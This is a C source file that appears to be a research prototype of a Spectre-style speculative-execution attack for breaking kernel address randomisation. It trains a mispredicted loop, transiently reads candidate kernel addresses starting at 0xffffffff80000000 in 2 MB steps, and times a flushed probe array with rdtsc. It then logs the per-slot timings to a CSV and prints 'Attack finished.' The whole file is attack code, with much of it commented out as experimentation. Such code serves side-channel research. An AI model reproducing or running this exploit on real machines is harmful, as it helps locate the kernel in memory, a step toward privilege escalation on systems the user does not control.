#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/sysinfo.h>
#include <unistd.h>
#include <math.h>
#include <ctype.h>
#include <getopt.h>
#include <signal.h>
#include <string.h>
#include <time.h>
#include <x86intrin.h>

#define ASLR_SIZE 512
#define ARRAY_SIZE 8
//#define INDEX_BIT   // Number of index bits, as per the example
#define CACHE_LINE 64
#define PAGE_SIZE 4096
#define KERNEL 0x200000

#define MEMACCESS(p)\
asm volatile ("movq (%0), %%rax\n"\
    :\
    : "c" (p)\
    : "rax")\

 void flush(void* p) {
    asm volatile ("clflush (%0)\n"
      :
      : "c" (p)
      : "rax");
  }

//const size_t memory_pool_size =  1024 * 1024 * 1024;
//int shuffle_range = memory_pool_size / PAGE_SIZE;
//int array_s[shuffle_range + 1];
int result[ASLR_SIZE] = {0};
uint8_t probe[257 * PAGE_SIZE];

void flushAll(void* start, int backward, int forward){
    for(int i= backward; i< forward; i+=64){
      void * address = start + (i);
      flush(address);
    }
}

uint8_t loop_function(uint8_t array_mid[], uint8_t iteration, uint8_t array[], uint64_t index) {
     uint64_t idx = 0;
     //printf("%llx\n", idx);
     //getchar();
      
     int i = 0;
     
     uint8_t value = 0;
     //value = (*(uint8_t*)(&array[i * 64] + idx));
     //printf("%d\n", value);
     //getchar();
     //uint8_t *ptr = NULL;
     //srand(time(NULL));
     
     //uint64_t mask;
     for (i; i < array_mid[i * 4096];) {
        //Mis-prediction
        //idx = index

        //idx = 0;
        idx = ((ARRAY_SIZE ^ i) - 1) & index;
        MEMACCESS(&probe[(*((uint8_t*)(&array[0] + idx)) + idx / index) * PAGE_SIZE]);
        //value =  (*(uint8_t*)(&array[0] + idx));
        

        i += 1;

     }
     //printf("Finished\n");
     //getchar();
     return value; 
}

int main(int argc, char const *argv[]) {
    uint8_t array[ARRAY_SIZE * CACHE_LINE];
    uint8_t array_mid[(ARRAY_SIZE + 1) * PAGE_SIZE];
    uint8_t array_out[ARRAY_SIZE * CACHE_LINE];
    int start, end;
    
    for (int i = 0; i < ARRAY_SIZE; i++) {
        array[i * CACHE_LINE] = 0;
        array_mid[i * PAGE_SIZE] = ARRAY_SIZE;
        array_out[i * CACHE_LINE] = 0; 
    }

    array_mid[ARRAY_SIZE * PAGE_SIZE] = ARRAY_SIZE;
    /*
    //asm volatile("mfence");
    start = _rdtsc();
    asm volatile("mfence");
    MEMACCESS(&array[0]);
    //asm volatile("lfence");
    end = _rdtsc() - start;
    printf("%d\n", end);
    */
    //uint8_t probe[257 * PAGE_SIZE];
    
    for (int i = 0; i < 257 * PAGE_SIZE; i++) {
        probe[i] = 3;
    }
    
    
    flushAll(&array, 0, ARRAY_SIZE * CACHE_LINE);
    flushAll(&array_mid, 0, (1 + ARRAY_SIZE) * PAGE_SIZE);
    flushAll(&array_out, 0, ARRAY_SIZE * CACHE_LINE);
    flushAll(&probe, 0, 257 * PAGE_SIZE);
    
    uint8_t* kernel_base;

    // Set the pointer to the base virtual address of the kernel
    kernel_base = (uint8_t*)0xffffffff80000000;

    //uint64_t index = (uint64_t)((uintptr_t)&array_out) - (uint64_t)((uintptr_t)&array[(ARRAY_SIZE - 1) * CACHE_LINE]);
    uint64_t index = 0;
    //printf("Array_out is %p, Array is %p, The distance is %ld\n", &array_out, &array[(ARRAY_SIZE - 1) * CACHE_LINE], index);
    
    //int start, end;
    int min_value = 100000;
    //getchar();
    //uint64_t index = 0;  
    int ret = 0;
    //int result[ASLR_SIZE];
    while(1) {
    for (int i = 0; i < ASLR_SIZE; i++) {
         index = (uint64_t)((uintptr_t)(kernel_base + i * KERNEL));
         //printf("%llx\n", index);
         index = index - (uint64_t)((uintptr_t)&array[0]);
         //printf("%llx\n", index);
         //loop_function(4, array, index);
         //loop_function(2, array, index);
         //loop_function(3, array, index);
         //loop_function(4, array, index);
         //loop_function(2, array, index);
         //flush(&array_out[0]);
         //result[i] = end;
	 ret = loop_function(array_mid, ARRAY_SIZE, array, index);
         
         for (int j = 1; j < 257; j++) {
             //asm volatile ("mfence");
             start = _rdtsc();
             asm volatile("mfence");
             MEMACCESS(&probe[j * PAGE_SIZE]);
             asm volatile("lfence");
             end = _rdtsc() - start;
             if (end < min_value)
                 min_value = end;
         }
         
         //array[0] = 1;         
        /*
         start = _rdtsc();
         asm volatile("mfence");
         //start = _rdtsc();
         //array[0]++;
         MEMACCESS(&array_out[7 * 64]);
         //asm volatile("lfence");
         end = _rdtsc() - start;
         */
         printf("");
	 printf("%d\n", end);
	 result[i] = end;
   
         asm volatile("mfence");
         flushAll(&array, 0, ARRAY_SIZE * CACHE_LINE);
         flushAll(&array_mid, 0,(1 + ARRAY_SIZE) * 4096);
         //flushAll(&array_out, 0, ARRAY_SIZE * CACHE_LINE);
         flushAll(&probe, 0, 257 * PAGE_SIZE);
         
    }
    
    if ((result[510] + 30 < result[0]) && (result[510] + 30 < result[55]) &&
 	(result[511] + 30 < result[0]) && (result[511] + 30 < result[55]))  
	    break;
    sleep(1);
    }
    char path[30];
    strcpy(path, "results/output.csv");
    FILE *fp = fopen(path, "a+");
    if (fp == NULL) {
        fprintf(stderr, "fopen() failed.\n");
        exit(EXIT_FAILURE);
    }
    int sum = 0;

    for (int i = 0 ; i < 512; i++) {
         fprintf(fp, "%d,%d\n", i, result[i]);
    }

    printf("Attack finished.\n");

    return ret;
}
